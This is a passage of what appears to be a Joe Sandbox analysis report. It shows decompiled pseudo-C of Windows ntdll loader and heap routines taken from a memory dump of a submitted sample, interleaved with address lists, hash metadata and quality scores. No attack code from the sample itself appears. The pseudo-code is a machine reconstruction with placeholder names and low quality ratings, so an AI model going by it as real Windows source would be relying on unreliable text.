                                                                                                                                                                            						if((_t67 & 0x00000003) != 0) {
                                                                                                                                                                            							_push(_t92);
                                                                                                                                                                            							E1D89E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                                                                                                                            							_t67 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            							_t118 = _t118 + 0x1c;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t67 & 0x00000010;
                                                                                                                                                                            						if((_t67 & 0x00000010) != 0) {
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            						}
                                                                                                                                                                            						_v93 = 0;
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
                                                                                                                                                                            					E1D857DF6(_v100);
                                                                                                                                                                            					_t76 = _v100;
                                                                                                                                                                            					_t103 =  *((intOrPtr*)(_t76 + 0x50));
                                                                                                                                                                            					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
                                                                                                                                                                            					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						 *0x1d9191e0( *((intOrPtr*)(_t76 + 0x18)));
                                                                                                                                                                            						 *_t87();
                                                                                                                                                                            						_t92 = _v100;
                                                                                                                                                                            						E1D83D3E1(_t87, _v100, _t113);
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t113 = E1D8416EE(_t87, _t103, _t110, _t113, _t122);
                                                                                                                                                                            					if(_t113 < 0) {
                                                                                                                                                                            						_t81 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            						_t88 = 0;
                                                                                                                                                                            						__eflags = _t81 & 0x00000003;
                                                                                                                                                                            						if((_t81 & 0x00000003) != 0) {
                                                                                                                                                                            							_push(_t113);
                                                                                                                                                                            							E1D89E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                                                                                                                            							_t81 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t81 & 0x00000010;
                                                                                                                                                                            						if((_t81 & 0x00000010) != 0) {
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            						}
                                                                                                                                                                            						_t92 = _t113;
                                                                                                                                                                            						E1D8A1D5E(_t113);
                                                                                                                                                                            						_push(_t113);
                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                            						E1D862C70();
                                                                                                                                                                            						_t113 = 0x20;
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t76 = _v100;
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                            				} while ( *_t110 != 0);
                                                                                                                                                                            				_t113 = 0x20;
                                                                                                                                                                            				goto L8;
                                                                                                                                                                            			}































                                                                                                                                                                            0x1d816574
                                                                                                                                                                            0x1d81657d
                                                                                                                                                                            0x1d816581
                                                                                                                                                                            0x1d81658b
                                                                                                                                                                            0x1d816590
                                                                                                                                                                            0x1d816598
                                                                                                                                                                            0x1d8165a3
                                                                                                                                                                            0x1d8165a6
                                                                                                                                                                            0x1d8165ad
                                                                                                                                                                            0x1d8165b1
                                                                                                                                                                            0x1d8165b3
                                                                                                                                                                            0x1d8165b8
                                                                                                                                                                            0x1d816637
                                                                                                                                                                            0x1d816637
                                                                                                                                                                            0x1d81663a
                                                                                                                                                                            0x1d81663e
                                                                                                                                                                            0x1d8166fa
                                                                                                                                                                            0x1d8166fa
                                                                                                                                                                            0x1d81664c
                                                                                                                                                                            0x1d816659
                                                                                                                                                                            0x1d81665f
                                                                                                                                                                            0x1d816665
                                                                                                                                                                            0x1d816667
                                                                                                                                                                            0x1d81666f
                                                                                                                                                                            0x1d816678
                                                                                                                                                                            0x1d81667d
                                                                                                                                                                            0x1d816684
                                                                                                                                                                            0x1d816686
                                                                                                                                                                            0x1d816692
                                                                                                                                                                            0x1d816697
                                                                                                                                                                            0x1d8798c3
                                                                                                                                                                            0x1d8798d3
                                                                                                                                                                            0x1d8798d3
                                                                                                                                                                            0x1d8798d5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8798ca
                                                                                                                                                                            0x1d8798cd
                                                                                                                                                                            0x1d8798cd
                                                                                                                                                                            0x1d8798cd
                                                                                                                                                                            0x1d8798d1
                                                                                                                                                                            0x1d8798d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81669d
                                                                                                                                                                            0x1d81669d
                                                                                                                                                                            0x1d8166a4
                                                                                                                                                                            0x1d8166aa
                                                                                                                                                                            0x1d8166ac
                                                                                                                                                                            0x1d8166ac
                                                                                                                                                                            0x1d8166b0
                                                                                                                                                                            0x1d8166c9
                                                                                                                                                                            0x1d8166cb
                                                                                                                                                                            0x1d8166d7
                                                                                                                                                                            0x1d8166dc
                                                                                                                                                                            0x1d8166e1
                                                                                                                                                                            0x1d8166f6
                                                                                                                                                                            0x1d8166b2
                                                                                                                                                                            0x1d8166b2
                                                                                                                                                                            0x1d8166b2
                                                                                                                                                                            0x1d8166b5
                                                                                                                                                                            0x1d8166b7
                                                                                                                                                                            0x1d8166b7
                                                                                                                                                                            0x1d8166ba
                                                                                                                                                                            0x1d8166bf
                                                                                                                                                                            0x1d8166c1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8166b2
                                                                                                                                                                            0x1d8166b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8165ba
                                                                                                                                                                            0x1d8165ba
                                                                                                                                                                            0x1d8165bf
                                                                                                                                                                            0x1d8165d5
                                                                                                                                                                            0x1d8165d9
                                                                                                                                                                            0x1d879835
                                                                                                                                                                            0x1d87983a
                                                                                                                                                                            0x1d87983c
                                                                                                                                                                            0x1d87983e
                                                                                                                                                                            0x1d879859
                                                                                                                                                                            0x1d87985e
                                                                                                                                                                            0x1d879863
                                                                                                                                                                            0x1d879863
                                                                                                                                                                            0x1d879866
                                                                                                                                                                            0x1d879868
                                                                                                                                                                            0x1d87986a
                                                                                                                                                                            0x1d87986a
                                                                                                                                                                            0x1d87986d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87986d
                                                                                                                                                                            0x1d8165e2
                                                                                                                                                                            0x1d8165ec
                                                                                                                                                                            0x1d8165f1
                                                                                                                                                                            0x1d8165f4
                                                                                                                                                                            0x1d8165f7
                                                                                                                                                                            0x1d8165fb
                                                                                                                                                                            0x1d81660f
                                                                                                                                                                            0x1d816614
                                                                                                                                                                            0x1d81661a
                                                                                                                                                                            0x1d81661c
                                                                                                                                                                            0x1d81661f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81661f
                                                                                                                                                                            0x1d816602
                                                                                                                                                                            0x1d816606
                                                                                                                                                                            0x1d879875
                                                                                                                                                                            0x1d87987a
                                                                                                                                                                            0x1d87987c
                                                                                                                                                                            0x1d87987e
                                                                                                                                                                            0x1d879880
                                                                                                                                                                            0x1d87989a
                                                                                                                                                                            0x1d87989f
                                                                                                                                                                            0x1d8798a4
                                                                                                                                                                            0x1d8798a7
                                                                                                                                                                            0x1d8798a9
                                                                                                                                                                            0x1d8798ab
                                                                                                                                                                            0x1d8798ab
                                                                                                                                                                            0x1d8798ac
                                                                                                                                                                            0x1d8798ae
                                                                                                                                                                            0x1d8798b3
                                                                                                                                                                            0x1d8798b4
                                                                                                                                                                            0x1d8798b6
                                                                                                                                                                            0x1d8798bd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8798bd
                                                                                                                                                                            0x1d81660c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d816624
                                                                                                                                                                            0x1d81662a
                                                                                                                                                                            0x1d81662f
                                                                                                                                                                            0x1d816636
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D879854, 1D879895
                                                                                                                                                                            • LdrpLoadShimEngine, xrefs: 1D87984A, 1D87988B
                                                                                                                                                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D879885
                                                                                                                                                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D879843
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 3446177414-3589223738
                                                                                                                                                                            • Opcode ID: f4dbb44b26104daeaac00d7212f0e6b56899e090d338bad9791c818473bda503
                                                                                                                                                                            • Instruction ID: 658a348bb14c32c8602655d424cfd51d4d249c3d22ec87084d24d71f747e3cbd
                                                                                                                                                                            • Opcode Fuzzy Hash: f4dbb44b26104daeaac00d7212f0e6b56899e090d338bad9791c818473bda503
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D514836A083589FDB05DBACCC95BED77B6BB44328F050229E565AF295CB70AC44C782
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                            			E1D84D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                            				signed char _t79;
                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                            				char _t99;
                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                            				signed char _t106;
                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                            				signed int _t137;
                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                            				void* _t141;
                                                                                                                                                                            				void* _t143;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x68);
                                                                                                                                                                            				_push(0x1d8fc5e8);
                                                                                                                                                                            				_t68 = E1D877BE4(__ebx, __edi, __esi);
                                                                                                                                                                            				_t127 =  *[fs:0x18];
                                                                                                                                                                            				_t97 =  *((intOrPtr*)(_t127 + 0x30));
                                                                                                                                                                            				if( *0x1d915da8 != 0) {
                                                                                                                                                                            					L19:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
                                                                                                                                                                            					return _t68;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t102 =  *(_t97 + 0x10);
                                                                                                                                                                            				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
                                                                                                                                                                            				_t70 =  *((intOrPtr*)(_t102 + 0x44));
                                                                                                                                                                            				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
                                                                                                                                                                            				_t103 =  *(_t97 + 0x10);
                                                                                                                                                                            				if(( *(_t103 + 8) & 0x00000001) == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *0x1d9137c0 & 0x00000005) != 0) {
                                                                                                                                                                            					_push(_t141 - 0x30);
                                                                                                                                                                            					E1D89E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
                                                                                                                                                                            					_t143 = _t143 + 0x1c;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t74 =  *((intOrPtr*)(_t127 + 0x24));
                                                                                                                                                                            				 *0x1d915dac =  *((intOrPtr*)(_t127 + 0x24));
                                                                                                                                                                            				 *0x1d915da8 = 1;
                                                                                                                                                                            				if( *0x1d9165f0 != 0) {
                                                                                                                                                                            					_t137 =  *0x1d9191f8; // 0x0
                                                                                                                                                                            					asm("ror esi, cl");
                                                                                                                                                                            					_t138 = _t137 ^  *0x7ffe0330;
                                                                                                                                                                            					_t103 = _t138;
                                                                                                                                                                            					 *0x1d9191e0(0x20);
                                                                                                                                                                            					_t74 =  *_t138();
                                                                                                                                                                            				}
                                                                                                                                                                            				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
                                                                                                                                                                            				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
                                                                                                                                                                            					_push(1);
                                                                                                                                                                            					E1D824779(_t74, _t118);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *0x1d91391c & 0x00000002) == 0) {
                                                                                                                                                                            					_t78 =  *(_t97 + 0x10);
                                                                                                                                                                            					__eflags =  *(_t78 + 8) & 0x40000000;
                                                                                                                                                                            					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
                                                                                                                                                                            					__eflags =  *0x1d919234 & 0x00000001;
                                                                                                                                                                            					_t79 = _t78 & 0xffffff00 | ( *0x1d919234 & 0x00000001) == 0x00000000;
                                                                                                                                                                            					__eflags = _t79 & _t106;
                                                                                                                                                                            					if((_t79 & _t106) == 0) {
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((char*)(_t141 - 0x19)) = 1;
                                                                                                                                                                            					_t99 = 0;
                                                                                                                                                                            					L15:
                                                                                                                                                                            					_t85 =  *[fs:0x30];
                                                                                                                                                                            					__eflags =  *0x1d9168c8;
                                                                                                                                                                            					if( *0x1d9168c8 != 0) {
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
                                                                                                                                                                            						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
                                                                                                                                                                            							E1D8A0FC8();
                                                                                                                                                                            							 *0x1d9168c8 = _t99;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *((char*)(_t141 - 0x19));
                                                                                                                                                                            					if( *((char*)(_t141 - 0x19)) == 0) {
                                                                                                                                                                            						E1D84D8F0();
                                                                                                                                                                            					}
                                                                                                                                                                            					_t68 = E1D84D898();
                                                                                                                                                                            					goto L19;
                                                                                                                                                                            				}
                                                                                                                                                                            				L7:
                                                                                                                                                                            				_t99 = 0;
                                                                                                                                                                            				 *((char*)(_t141 - 0x19)) = 0;
                                                                                                                                                                            				_t129 =  *0x1d915da0; // 0x17ddff0
                                                                                                                                                                            				L8:
                                                                                                                                                                            				if(_t129 != 0x1d915d9c) {
                                                                                                                                                                            					_t18 = _t129 - 0x10; // 0x17ddfe0
                                                                                                                                                                            					_t122 = _t18;
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
                                                                                                                                                                            					_t20 = _t129 + 4; // 0x17de0a0
                                                                                                                                                                            					_t129 =  *_t20;
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
                                                                                                                                                                            					_t22 = _t122 + 0x1c; // 0x73d39bf0
                                                                                                                                                                            					_t88 =  *_t22;
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
                                                                                                                                                                            					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
                                                                                                                                                                            						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
                                                                                                                                                                            						 *((intOrPtr*)(_t141 - 0x50)) = 1;
                                                                                                                                                                            						_t112 = 7;
                                                                                                                                                                            						memset(_t141 - 0x4c, 0, _t112 << 2);
                                                                                                                                                                            						_t143 = _t143 + 0xc;
                                                                                                                                                                            						_t31 = _t122 + 0x48; // 0x0
                                                                                                                                                                            						E1D83DC40(_t141 - 0x54,  *_t31);
                                                                                                                                                                            						 *((intOrPtr*)(_t141 - 4)) = _t99;
                                                                                                                                                                            						_t134 =  *((intOrPtr*)(_t141 - 0x24));
                                                                                                                                                                            						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
                                                                                                                                                                            						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
                                                                                                                                                                            							E1D83F0A3(_t99, 0, _t134, _t134, 1, __eflags);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(1);
                                                                                                                                                                            						_push(_t99);
                                                                                                                                                                            						E1D83DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
                                                                                                                                                                            						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
                                                                                                                                                                            						_t129 =  *((intOrPtr*)(_t141 - 0x20));
                                                                                                                                                                            						E1D84D886();
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t119 =  *0x1d915b24; // 0x17b2ce0
                                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
                                                                                                                                                                            				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 0x74)) = 1;
                                                                                                                                                                            					_t108 = 7;
                                                                                                                                                                            					memset(_t141 - 0x70, 0, _t108 << 2);
                                                                                                                                                                            					_t47 = _t119 + 0x48; // 0x0
                                                                                                                                                                            					E1D83DC40(_t141 - 0x78,  *_t47);
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 4)) = 1;
                                                                                                                                                                            					_t121 =  *0x1d915b24; // 0x17b2ce0
                                                                                                                                                                            					E1D83F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
                                                                                                                                                                            					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
                                                                                                                                                                            					E1D84D88F();
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}


























                                                                                                                                                                            0x1d84d6d0
                                                                                                                                                                            0x1d84d6d2
                                                                                                                                                                            0x1d84d6d7
                                                                                                                                                                            0x1d84d6dc
                                                                                                                                                                            0x1d84d6e3
                                                                                                                                                                            0x1d84d6ed
                                                                                                                                                                            0x1d84d810
                                                                                                                                                                            0x1d84d813
                                                                                                                                                                            0x1d84d81f
                                                                                                                                                                            0x1d84d81f
                                                                                                                                                                            0x1d84d6f3
                                                                                                                                                                            0x1d84d6f9
                                                                                                                                                                            0x1d84d6fc
                                                                                                                                                                            0x1d84d6ff
                                                                                                                                                                            0x1d84d702
                                                                                                                                                                            0x1d84d709
                                                                                                                                                                            0x1d88f0c2
                                                                                                                                                                            0x1d88f0c2
                                                                                                                                                                            0x1d84d716
                                                                                                                                                                            0x1d88f0cd
                                                                                                                                                                            0x1d88f0e7
                                                                                                                                                                            0x1d88f0ec
                                                                                                                                                                            0x1d88f0ec
                                                                                                                                                                            0x1d84d71c
                                                                                                                                                                            0x1d84d71f
                                                                                                                                                                            0x1d84d724
                                                                                                                                                                            0x1d84d732
                                                                                                                                                                            0x1d84d86d
                                                                                                                                                                            0x1d84d873
                                                                                                                                                                            0x1d84d875
                                                                                                                                                                            0x1d84d877
                                                                                                                                                                            0x1d84d879
                                                                                                                                                                            0x1d84d87f
                                                                                                                                                                            0x1d84d87f
                                                                                                                                                                            0x1d84d738
                                                                                                                                                                            0x1d84d740
                                                                                                                                                                            0x1d84d742
                                                                                                                                                                            0x1d84d744
                                                                                                                                                                            0x1d84d744
                                                                                                                                                                            0x1d84d750
                                                                                                                                                                            0x1d88f0f4
                                                                                                                                                                            0x1d88f0f7
                                                                                                                                                                            0x1d88f0fe
                                                                                                                                                                            0x1d88f101
                                                                                                                                                                            0x1d88f108
                                                                                                                                                                            0x1d88f10b
                                                                                                                                                                            0x1d88f10d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88f113
                                                                                                                                                                            0x1d88f117
                                                                                                                                                                            0x1d84d7ed
                                                                                                                                                                            0x1d84d7ed
                                                                                                                                                                            0x1d84d7f3
                                                                                                                                                                            0x1d84d7fa
                                                                                                                                                                            0x1d88f13c
                                                                                                                                                                            0x1d88f13f
                                                                                                                                                                            0x1d88f145
                                                                                                                                                                            0x1d88f14a
                                                                                                                                                                            0x1d88f14a
                                                                                                                                                                            0x1d88f13f
                                                                                                                                                                            0x1d84d800
                                                                                                                                                                            0x1d84d804
                                                                                                                                                                            0x1d84d806
                                                                                                                                                                            0x1d84d806
                                                                                                                                                                            0x1d84d80b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84d80b
                                                                                                                                                                            0x1d84d756
                                                                                                                                                                            0x1d84d756
                                                                                                                                                                            0x1d84d75a
                                                                                                                                                                            0x1d84d75d
                                                                                                                                                                            0x1d84d766
                                                                                                                                                                            0x1d84d76c
                                                                                                                                                                            0x1d84d76e
                                                                                                                                                                            0x1d84d76e
                                                                                                                                                                            0x1d84d771
                                                                                                                                                                            0x1d84d774
                                                                                                                                                                            0x1d84d774
                                                                                                                                                                            0x1d84d777
                                                                                                                                                                            0x1d84d77a
                                                                                                                                                                            0x1d84d77a
                                                                                                                                                                            0x1d84d77d
                                                                                                                                                                            0x1d84d782
                                                                                                                                                                            0x1d84d78d
                                                                                                                                                                            0x1d84d794
                                                                                                                                                                            0x1d84d799
                                                                                                                                                                            0x1d84d79f
                                                                                                                                                                            0x1d84d79f
                                                                                                                                                                            0x1d84d7a1
                                                                                                                                                                            0x1d84d7a7
                                                                                                                                                                            0x1d84d7ac
                                                                                                                                                                            0x1d84d7af
                                                                                                                                                                            0x1d84d7b2
                                                                                                                                                                            0x1d84d7b6
                                                                                                                                                                            0x1d84d7da
                                                                                                                                                                            0x1d84d7da
                                                                                                                                                                            0x1d84d7b8
                                                                                                                                                                            0x1d84d7b9
                                                                                                                                                                            0x1d84d7c0
                                                                                                                                                                            0x1d84d7c5
                                                                                                                                                                            0x1d84d7cc
                                                                                                                                                                            0x1d84d7cf
                                                                                                                                                                            0x1d84d7cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84d782
                                                                                                                                                                            0x1d84d7e1
                                                                                                                                                                            0x1d84d7e7
                                                                                                                                                                            0x1d84d7eb
                                                                                                                                                                            0x1d84d820
                                                                                                                                                                            0x1d84d827
                                                                                                                                                                            0x1d84d82c
                                                                                                                                                                            0x1d84d832
                                                                                                                                                                            0x1d84d834
                                                                                                                                                                            0x1d84d83a
                                                                                                                                                                            0x1d84d83f
                                                                                                                                                                            0x1d84d842
                                                                                                                                                                            0x1d84d84a
                                                                                                                                                                            0x1d84d84f
                                                                                                                                                                            0x1d84d856
                                                                                                                                                                            0x1d84d856
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D84D879
                                                                                                                                                                              • Part of subcall function 1D824779: RtlDebugPrintTimes.NTDLL ref: 1D824817
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 3446177414-1975516107
                                                                                                                                                                            • Opcode ID: 23bf1203a638b11419d79ba999caa62f8dec5c89b9c59b047f9b39824587a8d5
                                                                                                                                                                            • Instruction ID: 9dd29aa94518650dcaddf23f1727cb673ebbab14c89dd444f1701efe6ba7118e
                                                                                                                                                                            • Opcode Fuzzy Hash: 23bf1203a638b11419d79ba999caa62f8dec5c89b9c59b047f9b39824587a8d5
                                                                                                                                                                            • Instruction Fuzzy Hash: A3510375E083899FCB45CFACC4847ADBBB1BF44324F25C159D9146B291D774A942CBC2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 19%
                                                                                                                                                                            			E1D84DA20(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                            				char* _t45;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                            				void* _t82;
                                                                                                                                                                            				signed char* _t87;
                                                                                                                                                                            				signed char _t90;
                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                            				intOrPtr* _t94;
                                                                                                                                                                            				signed int* _t95;
                                                                                                                                                                            
                                                                                                                                                                            				_t93 = _a4;
                                                                                                                                                                            				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
                                                                                                                                                                            					E1D8E9335(_t93, 0, __ecx);
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                            					if(_t44 != 0) {
                                                                                                                                                                            						if( *_t44 == 0) {
                                                                                                                                                                            							goto L7;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                            						L8:
                                                                                                                                                                            						if( *_t45 != 0) {
                                                                                                                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                            								E1D8DF717(_t93);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					L7:
                                                                                                                                                                            					_t45 = 0x7ffe0380;
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                            					_t94 =  *0x1d91376c; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(_t93);
                                                                                                                                                                            					return  *_t94();
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
                                                                                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                                                            						_push("HEAP: ");
                                                                                                                                                                            						E1D81B910();
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D81B910("Invalid heap signature for heap at %p", _t93);
                                                                                                                                                                            					E1D81B910(", passed to %s", "RtlUnlockHeap");
                                                                                                                                                                            					_push("\n");
                                                                                                                                                                            					E1D81B910();
                                                                                                                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                                                                            						 *0x1d9147a1 = 1;
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						 *0x1d9147a1 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
                                                                                                                                                                            				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
                                                                                                                                                                            				_t13 = _t92 + 8;
                                                                                                                                                                            				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
                                                                                                                                                                            				if( *_t13 != 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
                                                                                                                                                                            				_t87 = _t92 + 4;
                                                                                                                                                                            				_t65 = 0xfffffffe;
                                                                                                                                                                            				asm("lock cmpxchg [edx], ecx");
